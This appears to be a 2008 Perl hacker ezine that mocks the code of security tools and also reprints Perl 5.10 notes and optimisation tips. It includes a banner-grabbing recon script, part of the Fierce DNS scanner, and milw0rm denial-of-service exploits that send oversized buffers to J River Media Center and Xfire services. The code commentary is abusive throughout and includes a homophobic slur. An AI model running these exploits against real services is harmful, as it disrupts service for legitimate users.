Documente Academic
Documente Profesional
Documente Cultură
%%%%
X x $$$$$$$$$$$ $$$$$$$$$$$ $$$$$$$$$$$ $$$$ %%%%%
%%%
x H H $$$$ $$$$ $$$$ $$$$ $$$$ $$$$ %%
H H H x $$$$ $$$$ $$$$ $$$$ $$$$ $$$$ %%
H H H H $$$$ $$$$ $$$$$$$ $$$$ $$$$ $$$$ %%%%%
H H H H $$$$$$$$$$$ $$$$$$$ $$$$$$$$$$$ $$$$ %%%%%
%
X HHHHHHHHH $$$$$$$$$$ $$$$ $$$$$$$$$$ $$$$ %%
H HHHHHHHHH $$$$ $$$$ $$$$ $$$$ $$$$ %%
%%
HHHHHHHHHH $$$$ $$$$$$$$$$$ $$$$ $$$$ $$$$$$$$$$$ %%
%%%
HHHHHHH $$$$ $$$$$$$$$$$ $$$$ $$$$ $$$$$$$$$$$
%%%%
%%%%%
[root@yourbox.anywhere]$ date
Sat Mar 1 18:22:16 EST 2008
Initiating...
Dumping...
Schooling...
Besides that, we bring to you all the exciting Perl material that you can handle.
We
have impressive collections of bad code to create lessons from, and educational
pieces
by (mostly) established Perl experts.
#!/usr/bin/perl
# usage: own-kyx.pl narc1.txt
#
# this TEAM #PHRACK script will extract the email addresses
# out of the narc*.txt files, enumerate the primary MX and NS
# for each domain, and grab the SSHD and APACHE server version
# from each of these hosts (if possible).
#
# For educational purposes only. Do not use.
# lawl this is old shit (but not past the statute of limitations)
# lets rag on old "TEAM #PHRACK"
close INF;
# plus you can do this while you read the file, not read it all
# first
foreach $victim (@targets) {
print "=====\t$victim \t=====\n";
my ($lusr, $domn) = split(/@/, $victim);
$smtphost = `host -tMX $domn |cut -d\" \" -f7 | head -1`;
# whats with random trailers? //e not even used here, you have
# an empty replacement! dumbfucks
$smtphost =~ s/[\r\n]+$//ge;
print ":: Primary MX located at $smtphost\n";
sshcheq($smtphost);
apachecheq($smtphost);
$nshost = `host -tNS $domn |cut -d\" \" -f4 | head -1`;
# //e again? wtf?
$nshost =~ s/[\r\n]+$//ge;
sleep(3);
print ":: Primary NS located at $nshost\n";
sshcheq($nshost);
apachecheq($nshost);
print "\n\n";
# parens everywhere
sleep(3);
sub sshcheq {
# I think someone is confused about where his paren is supposed to go!
(my $sshost) = @_;
print ":: Testing $sshost for sshd version\n";
# not a single good variable name in this script
$g = inet_aton($sshost); my $prot = 22;
socket(S,PF_INET,SOCK_STREAM,getprotobyname('tcp')) or die "$!\n";
if(connect(S,pack "SnA4x8",2,$prot,$g)) {
# omg this line isn't too bad
my @in;
select(S); $|=1; print "\n";
while(<S>){ push @in, $_;}
# @in = <S>; # lawl
# Parse while reading the file
select(STDOUT); close(S);
# man this is old school..
foreach $res (@in) {
if ($res =~ /SSH/) {
# MOST COMPLEX YOUR PROGRAM IS
chomp $res; print ":: SSHD version - $res\n";
}
}
} else { return 0; } # coulda done this first and saved some
# in-den-tation
}
# same shit different subroutine, maybe you could have made them into one
# with a pair of parameters HMM?
sub apachecheq {
(my $whost) = @_;
print ":: Testing $whost for Apache version\n";
$g = inet_aton($whost); my $prot = 80;
socket(S,PF_INET,SOCK_STREAM,getprotobyname('tcp')) or die "$!\n";
if(connect(S,pack "SnA4x8",2,$prot,$g)) {
my @in;
select(S); $|=1; print "HEAD / HTTP/1.0\r\n\r\n";
while(<S>){ push @in, $_;}
select(STDOUT); close(S);
foreach $res (@in) {
if ($res =~ /ache/) {
chomp $res; print ":: HTTPD version - $res\n";
}
}
} else { return 0; }
}
Damian said that this list, in expanded form, is going to be part of the
standard Perl distribution soon.
- When types of data form a natural hierarchy that lets us use inheritance.
Inheritance is one of the most powerful feature of OO, and the ability to
use it is a flag.
- When you have a piece of data on which many different operations are
applied
Graphics images, for instance, might be blurred, cropped, rotated, and
adjusted.
- When the kinds of operations have standard names (check, process, etc)
Objects allow you to have a DB::check, ISBN::check, Shape::check, etc
without having conflicts between the types of check.
First, allow us to explain Perl versions, so you understand just what this
means. Note, especially, that Perl 5.10 is not Perl 5.1, it's Perl 5.10,
which comes after Perl 5.9. It's not Perl 6, it's the latest continuation
of the Perl 5 language. Perl 6 is still coming.
Major releases:
Now, at this point it might seem weird that Perl jumped four versions in
seven years, yet in the 14 since then it has not moved on. Partially, it
has, Perl 6 has been (roughly) specified and implemented. But it isn't
quite *here*, for various reasons.
Thirdly, Perl is more stable and mature now, the rate of growth has slowed.
That's one long story! The story is that now even decimals represent stable
releases, while odd ones (5.9) represent the working development version.
See perlhist for much more detail.
Perl 5.10 is a big deal. We have been using Perl 5.8 for six years now.
Like any other Perl release, 5.10 has brought some things that will change
how we code Perl. It also brought some things that won't do that, and some
things that we might think better of in a few years.
Here are a few of the good ones that you're likely to see.
say(). say() is like Ruby puts(), or Python print(), or Perl 6 say(), etc.
All it is is a print with a newline. It'll definitely be less of a pain in
the ass than print and a \n, and looks cleaner.
Lexical $_. Instead of being worried about clobbering $_, we can create
a lexical version and all is good, leading to shorter syntax.
State variables. This is something we should have had a long time ago.
They are similar in concept to C static variables. Better than using a
closure (which has also improved in Perl 5.10), usually.
The notorious given statement: Perl finally has a switch statement. Kind
of. Take a look, the syntax is kind of a hassle and will make you wonder
why you aren't just using if blocks. Until you read how it uses smart
matching. The naming is smartly in-tune with the linguistic character of
Perl.
Possibly the single most pressing change in Perl 5.10 is smart matching.
Smart matching is just that, you give two operands and Perl compares them
in a natural way. Gives us a whole new area to be confused in, and to
create data-dependent runtime bugs.
~~~~~
The behaviour of a smart match depends on what type of thing its arguments
are. It is always commutative, i.e. $a ~~ $b behaves the same as $b ~~ $a.
The behaviour is determined by the following table: the first row that
applies, in either order, determines the match behaviour.
Hash Hash hash keys identical [sort keys %$a]~~[sort keys %$b]
Hash Array hash slice existence grep {exists $a->{$_}} @$b
Hash Regex hash key grep grep /$b/, keys %$a
Hash Any hash entry existence exists $a->{$b}
+ - this must be a code reference whose prototype (if present) is not ""
(subs with a "" prototype are dealt with by the 'Code()' entry lower
down)
* - that is, each element matches the element of same index in the other
array. If a circular reference is found, we fall back to referential
equality.
! - either a real number, or a string that looks like a number
The "matching code" doesn't represent the real matching code, of course:
it's just there to explain the intended meaning. Unlike grep, the smart
match operator will short-circuit whenever it can.
~~~~
Smart matching is one of those fancy Perl 6 features that some people
did not want backported to Perl 5. The official PU position is that when
Perl 6 comes to the show, the world will probably use it, sooner or later.
But until then, don't hold anything back, Perl 5 is beautiful and we can
continue to make it better.
More on Perl 5.10 at the end of the zine. If you can't wait, check out
these pieces right now. Or do it later, but either way, read them. There
is a lot more than just what we have summarized here.
http://dev.perl.org/perl5/news/2007/perl-5.10.0.html
http://search.cpan.org/dist/perl-5.10.0/pod/perl5100delta.pod
#!/usr/bin/perl
#########################################
# Fierce v0.9.9 - Beta 03/24/2007
# By RSnake http://ha.ckers.org/fierce/
# Threading and additions by IceShaman
#########################################
my @common_cnames;
my $count_hostnames = 0;
my @domain_ns;
my $h;
my @ip_and_hostname;
my $logging;
my %options = ();
my $res = Net::DNS::Resolver->new;
my $search_found;
my %subnets;
my %tested_names;
my $this_ip;
my $version_num = 'Version 0.9.9 - Beta 03/24/2007';
my $webservers = 0;
my $wildcard_dns;
my @wildcards;
my @zone;
my $count;
my %known_ips;
my %known_names;
my @output;
my @thread;
my $thread_support;
# Wow, nice load of variables there.
my $result = GetOptions (
'dns=s' => \$dns,
'file=s' => \$filename,
'suppress' => \$suppress,
'help' => \$help,
'connect=s' => \$http_connect,
'range=s' => \$range,
'wide' => \$wide,
'delay=i' => \$delay,
'dnsfile=s' => \$dns_file,
'dnsserver=s' => \$dns_server,
'version' => \$version,
'search=s' => \$search,
'wordlist=s' => \$wordlist,
'fulloutput' => \$full_output,
'nopattern' => \$nopattern,
'tcptimeout=i' => \$tcp_timeout,
'traverse=i' => \$traverse,
'threads=i' => \$threads,
);
if ($http_connect) {
unless (-e $http_connect) {
open (HEADERS, "$http_connect") # Why'd you quote the scalar here, but
# not above? And don't you know about
# the security risks of using open()
# like this
or quit_early("Having trouble opening $http_connect");
close HEADERS; # uh... open... and close... Are you just testing that
# you can? -r for that
}
}
if ($dns_file) {
open (DNSFILE, '<', $dns_file)
or quit_early("Can't open $dns_file");
for (<DNSFILE>) {
chomp;
push @dns_servers, $_; # yucky sucky
}
if (@dns_servers) {
output("Using DNS servers from $dns_file");
} else {
output("DNS file $dns_file is empty, using default options");
}
}
# OK these guys are just too lame to profile much more of their code
# We're gonna cut almost all of it out and just point out a few especially
# funny parts
# lawl someone meant > 255! Someone did not test his shitty code!
quit_early('The -t flag must contain an integer 0-255') if $traverse <
255;
# This line here makes those or's look kinda dumb, huh?
$wordlist = $wordlist || 'hosts.txt';
if (-e $wordlist) {
# user provided or default
open (WORDLIST, '<', $wordlist) or
open (WORDLIST, '<', 'hosts.txt') or
quit_early("Can't open $wordlist or the default wordlist");
# It's just all very silly and stupid. To think that these guys wrote this up,
# didn't clean it, didn't even test it, and then released it to the world like
# it was big shit and they were bigger. kids, just keep your shitty code to
# yourself. Or send it to us for PU+ certification.
# RSnake needs to stick to his nice easy PHP world, where he can be a god
# among retards. Same for IceShaman and HTS. Neither can play with grown-ups.
Introduction
So you have a perl script. And it's too slow. And you want to do something
about it. This is a talk about what you can do to speed it up, and also
how you try to avoid the problem in the first place.
Obvious things
Your code runs in the most efficient way that you can think of. But maybe
someone else looked at the problem from a completely different direction
and found an algorithm that is 100 times faster. Are you sure you have the
best algorithm? Do some research.
mod_perl
For a CGI script that I wrote, I found that even after I'd shaved
everything off it that I could, the server could still only serve 2.5 per
second. The same server running the same script under mod_perl could serve
25 per second. That's a factor of 10 speedup for very little effort. And
if your script isn't suitable for running under mod_perl there's also
fastcgi (which CGI.pm supports). And if your script isn't a CGI, you could
look at the persistent perl daemon, package PPerl on CPAN.
XS
You may find that 95% of the time is spent in 5% of the code, doing
something that perl is not that efficient at, such as bit shifting. So you
could write that bit in C, leave the rest in perl, and glue it together
with XS. But you'd have to learn XS and the perl API, and that's a lot of
work.
Inline
Or you could use Inline. If you have to manipulate perl's internals then
you'll still have to learn perl's API, but if all you need is to call out
from perl to your pure C code, or someone else's C library then Inline
makes it easy.
Here's my perl script making a call to a perl function rot32. And here's a
C function rot32 that takes 2 integers, rotates the first by the second,
and returns an integer result. That's all you need! And you run it and it
works.
#!/usr/local/bin/perl -w
use strict;
Are you running your script on the perl supplied by the OS? Compiling your
own perl could make your script go faster. For example, when perl is
compiled with threading, all its internal variables are made thread safe,
which slows them down a bit. If the perl is threaded, but you don't use
threads then you're paying that speed hit for no reason. Likewise, you may
have a better compiler than the OS used. For example, I found that with
gcc 3.2 some of my C code run 5% faster than with 2.9.5. [One of my
helpful hecklers in the audience said that he'd seen a 14% speedup, (if I
remember correctly) and if I remember correctly that was from recompiling
the perl interpreter itself]
hashes
There's a Larry Wall quote - Doing linear scans over an associative array
is like trying to club someone to death with a loaded Uzi.
I trust you're not doing that. But are you keeping your arrays nicely
sorted so that you can do a binary search? That's fast. But using a hash
should be faster.
regexps
pack and unpack have far too many features to remember. Look at the
manpage - you may be able to replace entire subroutines with just one
unpack.
undef
For example the script in the Encode module that compiles character
conversion tables would print out a warning if it saw the same character
twice. If you or I build perl we'll just let those build warnings scroll
off the screen - we don't care - we can't do anything about it. And it
turned out that keeping track of everything needed to generate those
warnings was slowing things down considerably. So I added a flag to
disable that code, and perl 5.8 defaults to use it, so it builds more
quickly.
Intermission
Various helpful hecklers (most of London.pm who saw the talk (and I'm
counting David Adler as part of London.pm as he's subscribed to the list))
wanted me to remind people that you really really don't want to be
optimising unless you absolutely have to. You're making your code harder
to maintain, harder to extend, and easier to introduce new bugs into.
Probably you've done something wrong to get to the point where you need to
optimise in the first place.
I agree.
Also, I'm not going to change the running order of the slides. There isn't
a good order to try to describe things in, and some of the ideas that
follow are actually more "good practice" than optimisation techniques, so
possibly ought to come before the slides on finding slowness. I'll mark
what I think are good habits to get into, and once you understand the
techniques then I'd hope that you'd use them automatically when you first
write code. That way (hopefully) your code will never be so slow that you
actually want to do some of the brute force optimising I describe here.
Tests
The most important thing when you are optimising existing working code is
not to introduce new bugs.
For this, you can use your full suite of regression tests. You do have
one, don't you?
[At this point the audience is supposed to laugh nervously, because I'm
betting that very few people are in this desirable situation of having
comprehensive tests written]
You must keep a copy of your original program. It is your last resort if
all else fails. Check it into a version control system. Make an off site
backup. Check that your backup is readable. You mustn't lose it.
In the end, your ultimate test of whether you've not introduced new bugs
while optimising is to check that you get identical output from the
optimised version and the original. (With the optimised version taking
less time).
CPU
It's obvious that if you script hogs the CPU for 10 seconds solid, then to
make it go faster you'll need to reduce the CPU demand.
RAM
You can never have enough memory, and it's never fast enough.
Computer memory is like a pyramid. At the point you have the CPU and its
registers, which are very small and very fast to access. Then you have 1
or more levels of cache, which is larger, close by and fast to access.
Then you have main memory, which is quite large, but further away so
slower to access. Then at the base you have disk acting as virtual memory,
which is huge, but very slow.
Now, if your program is swapping out to disk, you'll realise, because the
OS can tell you that it only took 10 seconds of CPU, but 60 seconds
elapsed, so you know it spent 50 seconds waiting for disk and that's your
speed problem. But if your data is big enough to fit in main RAM, but
doesn't all sit in the cache, then the CPU will keep having to wait for
data from main RAM. And the OS timers I described count that in the CPU
time, so it may not be obvious that memory use is actually your problem.
This is the original code for the part of the Encode compiler (enc2xs)
that generates the warnings on duplicate characters:
if (exists $seen{$uch}) {
warn sprintf("U%04X is %02X%02X and %02X%02X\n",
$val,$page,$ch,@{$seen{$uch}});
}
else {
$seen{$uch} = [$page,$ch];
}
It uses the hash %seen to remember all the Unicode characters that it has
processed. The first time that it meets a character it won't be in the
hash, the exists is false, so the else block executes. It stores an
arrayref containing the code page and character number in that page.
That's three things per character, and there are a lot of characters in
Chinese.
That reduced the memory usage by a third, and it runs more quickly.
Step by step
How do you make things faster? Well, this is something of a black art,
down to trial and error. I'll expand on aspects of these 4 points in the
next slides.
What might be slow?
You need to find things that are actually slow. It's no good wasting your
effort on things that are already fast - put it in where it will get
maximum reward.
Think of re-write
But not all slow things can be made faster, however much you swear at
them, so you can only actually speed things up if you can figure out
another way of doing the same thing that may be faster.
Try it
But it may not. Check that it's faster and that it gives the same results.
Note results
Either way, note your results - I find a comment in the code is good. It's
important if an idea didn't work, because it stops you or anyone else
going back and trying the same thing again. And it's important if a change
does work, as it stops someone else (such as yourself next month) tidying
up an important optimisation and losing you that hard won speed gain.
By having commented out slower code near the faster code you can look back
and get ideas for other places you might optimise in the same way.
These are things that I would consider good practice, so you ought to be
doing them as a matter of routine.
If you're writing modules use the AutoSplit and AutoLoader modules to make
perl only load the parts of your module that are actually being used by a
particular script. You get two gains - you don't waste CPU at start up
loading the parts of your module that aren't used, and you don't waste the
RAM holding the the structures that perl generates when it has compiled
code. So your modules load more quickly, and use less RAM.
Schwern notes that commenting out __END__ can cause surprises if the main
body of your module is running under use strict; because now your
AutoLoaded subroutines will suddenly find themselves being run under use
strict. This is arguably a bug in the current AutoSplit - when it runs at
install time to generate the files for AutoLoader to use it doesn't add
lines such as use strict; or use warnings; to ensure that the split out
subroutines are in the same environment as was current at the __END__
statement. This may be fixed in 5.10.
Elizabeth Mattijsen notes that there are different memory use versus
memory shared issues when running under mod_perl, with different optimal
solutions depending on whether your apache is forking or threaded.
=pod @ __END__
If you are documenting your code with one big block of pod, then you
probably don't want to put it at the top of the file. The perl parser is
very fast at skipping pod, but it's not magic, so it still takes a little
time. Moreover, it has to read the pod from disk in order to ignore it.
#!perl -w
use strict;
=head1 You don't want to do that
big block of pod
=cut
...
1;
__END__
=head1 You want to do this
If you put your pod after an __END__ statement then the perl parser will
never even see it. This will save a small amount of CPU, but if you have a
lot of pod (>4K) then it might also mean that the last disk block(s) of a
file are never even read in to RAM. This may gain you some speed. [A
helpful heckler observed that modern raid systems may well be reading in
64K chunks, and modern OSes are getting good at read ahead, so not reading
a block as a result of =pod @ __END__ may actually be quite rare.]
If you are putting your pod (and tests) next to their functions' code
(which is probably a better approach anyway) then this advice is not
relevant to you.
Most modules are able to export lots of their functions and other symbols
into your namespace to save you typing. If you have only one argument to
use, such as
use POSIX; # Exports all the defaults
then POSIX will helpfully export its default list of symbols into your
namespace. If you have a list after the module name, then that is taken as
a list of symbols to export. If the list is empty, no symbols are
exported:
use POSIX (); # Exports nothing.
You can still use all the functions and other symbols - you just have to
use their full name, by typing POSIX:: at the front. Some people argue
that this actually makes your code clearer, as it is now obvious where
each subroutine is defined. Independent of that, it's faster:use POSIX;
use POSIX ();
0.516s 0.355s
use Socket; use Socket ();
0.270s 0.231s
regexps
avoid $&
The $& variable returns the last text successfully matched in any regular
expression. It's not lexically scoped, so unlike the match variables $1
etc it isn't reset when you leave a block. This means that to be correct
perl has to keep track of it from any match, as perl has no idea when it
might be needed. As it involves taking a copy of the matched string, it's
expensive for perl to keep track of. If you never mention $&, then perl
knows it can cheat and never store it. But if you (or any module) mentions
$& anywhere then perl has to keep track of it throughout the script, which
slows things down. So it's a good idea to capture the whole match
explicitly if that's what you need.
$text =~ /.* rules/;
$line = $&; # Now every match will copy $& - slow
$text =~ /(.* rules)/;
$line = $1; # Didn't mention $& - fast
use English gives helpful long names to all the punctuation variables.
Unfortunately that includes aliasing $& to $MATCH which makes perl think
that it needs to copy every match into $&, even if you script never
actually uses it. In perl 5.8 you can say use English '-no_match_vars'; to
avoid mentioning the naughty "word", but this isn't available in earlier
versions of perl.
Are you using parentheses for capturing, or just for grouping? Capturing
involves perl copying the matched string into $1 etc, so it all you need
is grouping use a the non-capturing (?:...) instead of the capturing
(...).
/.../o;
If you define scalars with building blocks for your regexps, and then make
your final regexp by interpolating them, then your final regexp isn't
going to change. However, perl doesn't realise this, because it sees that
there are interpolated scalars each time it meets your regexp, and has no
idea that their contents are the same as before. If your regexp doesn't
change, then use the /o flag to tell perl, and it will never waste time
checking or recompiling it.
but don't blow it
You can use the qr// operator to pre-compile your regexps. It often is the
easiest way to write regexp components to build up more complex regexps.
Using it to build your regexps once is a good idea. But don't screw up
(like parrot's assemble.pl did) by telling perl to recompile the same
regexp every time you enter a subroutine:
sub foo {
my $reg1 = qr/.../;
my $reg2 = qr/... $reg1 .../;
You should pull those two regexp definitions out of the subroutine into
package variables, or file scoped lexicals.
Devel::DProf
You find what is slow by using a profiler. People often guess where they
think their program is slow, and get it hopelessly wrong. Use a profiler.
which times things and stores the data in a file named tmon.out. Then you
run dprofpp to process the tmon.out file, and produce meaningful summary
information. This excerpt is the default length and format, but you can
use options to change things - see the man page. It also seems to show up
a minor bug in dprofpp, because it manages to total things up to get 106%.
At the top of the list, the subroutine enter takes about half the total
CPU time, with 200,000 calls, each very fast. That makes it a good
candidate to optimise, because all you have to do is make a slight change
that gives a small speedup, and that gain will be magnified 200,000 times.
[It turned out that enter was tail recursive, and part of the speed gain I
got was by making it loop instead]
Third on the list is encode_U, which with 45,000 calls is similar, and
worth looking at. [Actually, it was trivial code and in the real enc2xs I
inlined it]
Don't bother below there, as you've accounted for 90% of total program
time, so even if you did a perfect job on everything else, you could only
make the program run 10% faster.
Benchmark
Now you've identified the slow spots, you need to try alternative code to
see if you can find something faster. The Benchmark module makes this
easy. A particularly good subroutine is cmpthese, which takes code
snippets and plots a chart. cmpthese was added to Benchmark with perl 5.6.
So to compare two code snippets orig and new by running each for 10000
times you'd do this:
use Benchmark ':all';
sub orig {
...
}
sub new {
...
}
Benchmark runs both, times them, and then prints out a helpful comparison
chart:
Benchmark: timing 10000 iterations of new, orig...
new: 1 wallclock secs ( 0.70 usr + 0.00 sys = 0.70 CPU) @
14222.22/s (n=10000)
orig: 4 wallclock secs ( 3.94 usr + 0.00 sys = 3.94 CPU) @
2539.68/s (n=10000)
Rate orig new
orig 2540/s -- -82%
new 14222/s 460% --
and it's plain to see that my new code is over 4 times as fast as my
original code.
Actually, I didn't tell the whole truth earlier about what causes slowness
in perl. [And astute hecklers such as Philip Newton had already told me
this]
Computers are fast at simple things like addition. But there is quite a
lot of overhead involved in keeping track of "which op am I currently
performing" and "where is the next op", and this book-keeping often swamps
the time taken to actually run the ops. So often in perl it's the number
of ops your program takes to perform its task that is more important than
the CPU they use or the RAM it needs. The hit list is
Ops
CPU
RAM
new
21618, 24932, 26990, 26400, 29556, 31084, 25903, 28001, 26990, 29793,
26990, 24930, 26988, 26996, 31008, 26223, 29216, 29552, 25957, 25646
but the first one is much slower. Why? Following the data path from right
to left, it starts well with a global regexp, which is only one op and
therefore a fast way to generate a list of the 4 digit groups. But that
map block is actually an implicit loop, so for each 4 digit block it
iterates round and repeatedly calls hex. Thats at least one op for every
list item.
Whereas the second one has no loops in it, implicit or explicit. It uses
one pack to convert the hex temporarily into a binary string, and then one
unpack to convert that string into a list of numbers. n is big endian 16
bit quantities. I didn't know that - I had to look it up. But when the
profiler told me that this part of the original code was a performance
bottleneck, the first think that I did was to look at the the pack docs to
see if I could use some sort of pack/unpack as a speedier replacement.
Ops are bad, m'kay
You can ask perl to tell you the ops that it generates for particular code
with the Terse backend to the compiler. For example, here's a 1 liner to
show the ops in the original code:
At the bottom you can see how the match /(....)/ is just one op. But the
next diagonal line of ops from mapwhile down to the match are all the ops
that make up the map. Lots of them. And they get run each time round map's
loop. [Note also that the {}s mean that map enters scope each time round
the loop. That not a trivially cheap op either]
There are less ops in total. And no loops, so all the ops you see execute
only once. :-)
[My helpful hecklers pointed out that it's hard to work out what an op is.
Good call. There's roughly one op per symbol (function, operator, variable
name, and any other bit of perl syntax). So if you golf down the number of
functions and operators your program runs, then you'll be reducing the
number of ops.]
Memoize
MJD's Memoize follows the grand perl tradition by trading memory for
speed. You tell Memoize the name(s) of functions you'd like to speed up,
and it does symbol table games to transparently intercept calls to them.
It looks at the parameters the function was called with, and uses them to
decide what to do next. If it hasn't seen a particular set of parameters
before, it calls the original function with the parameters. However,
before returning the result, it stores it in a hash for that function,
keyed by the function's parameters. If it has seen the parameters before,
then it just returns the result direct from the hash, without even
bothering to call the function.
This is useful for functions that calculate things with no side effects,
slow functions that you often call repeatedly with the same parameters.
It's not useful for functions that do things external to the program (such
as generating output), nor is it good for very small, fast functions.
The hash Memoize uses is a regular perl hash. This means that you can tie
the hash to a disk file. This allows Memoize to remember things across
runs of your program. That way, you could use Memoize in a CGI to cache
static content that you only generate on demand (but remember you'll need
file locking). The first person who requests something has to wait for the
generation routine, but everyone else gets it straight from the cache. You
can also arrange for another program to periodically expire results from
the cache.
As of 5.8 Memoize module has been assimilated into the core. Users of
earlier perl can get it from CPAN.
Miscellaneous
These are quite general ideas for optimisation that aren't particularly
perl specific.
perl's hash lookups are fast. But they aren't as fast as a lexical
variable. enc2xs was calling a function each time round a loop based on a
hash lookup using $type as the key. The value of $type didn't change, so I
pulled the lookup out above the loop into a lexical variable:
my $type_func = $encode_types{$type};
Something else I found was that enc2xs was calling a function which took
several arguments from a small number of places. The function contained
code to set defaults if some of the arguments were not supplied. I found
that the way the program ran, most of the calls passed in all the values
and didn't need the defaults. Changing the function to not set defaults,
and writing those defaults out explicitly where needed bought me a speed
up.
Tail recursion
Tail recursion is where the last thing a function does it call itself
again with slightly different arguments. It's a common idiom, and some
languages can automatically optimise it away. Perl is not one of those
languages. So every time a function tail recurses you have another
subroutine call [not cheap - Arthur Bergman notes that it is 10 pages of C
source, and will blow the instruction cache on a CPU] and re-entering that
subroutine again causes more memory to be allocated to store a new set of
lexical variables [also not cheap].
perl can't spot that it could just throw away the old lexicals and re-use
their space, but you can, so you can save CPU and RAM by re-writing your
tail recursive subroutines with loops. In general, trying to reduce
recursion by replacing it with iterative algorithms should speed things
up.
yay for y
tr doesn't delete characters unless you use the /d flag. If you don't even
have any replacement characters then it treats its target as read only. In
scalar context it returns the number of characters that matched. It's the
fastest way to count the number of occurrences of single characters and
character ranges. (ie it's faster than counting the elements returned by
m/.../g in list context. But if you just want to see whether one or more
of a character is present use m/.../, because it will stop at the u first,
whereas tr/// has to go to the end)
tr is faster than the regexp engines for doing character range deletions.
[When writing the slide I assumed that it would be faster for single
character deletions, but I Benchmarked things and found that s///g was
faster for them. So never guess timings; always test things. You'll be
surprised, but that's better than being wrong]
Ops are bad, m'kay
The original makes a temporary list with split [not bad in itself - ops
are more important than CPU or RAM] and then loops over it. Each time
round the loop it executes several ops, including using ord to convert the
byte to its numeric value, and then using sprintf with the format
"\\x%02X" to convert that number to the C source.
The new code effectively merges the split and looped ord into one op,
using unpack's C format to generate the list of numeric values directly.
The more interesting (arguably sick) part is the format to sprintf, which
is inside +(...). You can see from the .= in the original that the code is
just concatenating the converted form of each byte together. So instead of
making sprintf convert each value in turn, only for perl ops to stick them
together, I use x to replicate the per-byte format string once for each
byte I'm about to convert. There's now one "\\x%02X" for each of the
numbers in the list passed from unpack to sprintf, so sprintf just does
what it's told. And sprintf is faster than perl ops.
You have enormous power at your disposal with regexps, pack, unpack and
sprintf. So why not use them?
All the pack and unpack code is implemented in pure C, so doesn't have any
of the book-keeping overhead of perl ops. sprintf too is pure C, so it's
fast. The regexp engine uses its own private bytecode, but it's specially
tuned for regexps, so it runs much faster than general perl code. And the
implementation of tr has less to do than the regexp engine, so it's
faster.
For maximum power, remember that you can generate regexps and the formats
for pack, unpack and sprintf at run time, based on your data.
Make it obvious to the interpreter what you're up to. Avoid $&, use
(?:...) when you don't need capturing, and put the /o flag on constant
regexps.
less OPs
Try to accomplish your tasks using less operations. If you find you have
to optimise an existing program then this is where to start - golf is
good, but remember it's run time strokes not source code strokes.
less CPU
less RAM
but don't forget to think about how your data structures work to see if
you can make them use less RAM.
#!/usr/bin/perl
##Credit to n00b for finding this bug..^ ^
##########################################################################
##
#Media Center 11 d0s exploit overly long string.
#TiVo server plugin..Runs on port tcp :8070
#Also J. River UPnP Server Version 1.0.34
#is also afected by the same bug which is just a
#dos exploit.As we know the port always changes for the
#UPnP server so you may have to modify the proof of concept a little
#This exploit will deny legitimate user's from using the service
#We should see a error with the following msg Upon sucsessfull
exploitation.
#All 3 of the server plugin's will fail includin the library server which
#is set to port :80 by default.The only debug info i was able to collect
#at crash time is also provided with the proof of concept.
#As you can see from the debug info provided we canot control any memory
#Adresses.
#Shout's to aelph and every-one who has helped me over the year's.
##########################################################################
###
# X Microsoft Visual C ++ Runtime Library
#
# Buffer overrun detected!
#
# C:\Program Files\J River\Media Center 11\Media center.exe
#
# A Buffer overrun has been detected which has corrupted the program's
# internal state. The program cannot safely continue execution and must
# be now terminated.
# Bah fucking shame..
##########################################################################
####
#o/s info: win xp sp.2 Media Center 11.0.309 (not registered)
# \\ DEBUG INFO //
#
#eax=77c26ed2 ebx=00000000 ecx=77c1129c edx=00000000 esi=77f7663e
edi=00000003
#eip=7ffe0304 esp=01b7e964 ebp=01b7ea5c iopl=0 nv up ei pl nz na
pe nc
#cs=001b ss=0023 ds=0023 es=0023 fs=0038 gs=0000
efl=00000202
#SharedUserData!SystemCallStub+0x4:
#7ffe0304 c3 ret
##########################################################################
####
print "Media Center 11.0.309 Remote d0s J River TiVo server all 3 plugin's
are vuln by n00b \n";
$payload = "\x41"x5500;
$socket = IO::Socket::INET->new(PeerAddr=>$ip,
PeerPort=>$port,
Proto=>$protocol,
Timeout=>'1') || die "Make sure service is
running on the port\n";
# Make sure brain is implanted in that light blub you call head
# milw0rm.com [2006-09-05]
#!/usr/bin/perl
#Moderator of http://igniteds.net
##########################################################################
####
#X fire version:new Release 1.64 <12th, 2006>
##########################################################################
####
# Comments removed due to high level of homosexuality
print " 0day Xfire remote dos exploit coded by n00b Release 1.64 <12th,
2006> \n";
# Trying to look leet now? Or did we completely forget the 'x' operator now?
$payload = "\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41".
"\x41\x41\x41\x41\x41\x41\x41\x41\x41\x41";
$port = '25777'; # DON'T EVER QUOTE INTEGERS AGAIN YOU USELESS PIECE OF
SHIT
$socket = IO::Socket::INET->new(PeerAddr=>$ip,
PeerPort=>$port,
Proto=>$protocol,
Timeout=>'1') || die "Make sure service is
running on the port\n";
# milw0rm.com [2006-10-16]
#!/usr/bin/perl
############################################################
#Credit:To n00b for finding this bug and writing poc.
############################################################
#Ultra ISO stack over flow poc code.
#Ultra iso is exploitable via opening
#a specially crafted Cue file..There is
#A limitation that the user must have the bin
#file in the same dir as the cue file.
#This is the reason i have provided the
#Bin file also Command execution is possible
#As we can control $ebp and $eip hoooooha.
#I will be working on the local exploit
#as soon as i get a chance this should be a straight forward
#to exploit this as we already gain control of the
#$eip register..
#Tested on :win xp service pack 2
#Vendor's web site: http://www.ezbsystems.com/ultraiso
# Version affected: UltraISO 8.6.2.2011
############################################################
#Debug info as follows.
#########################################
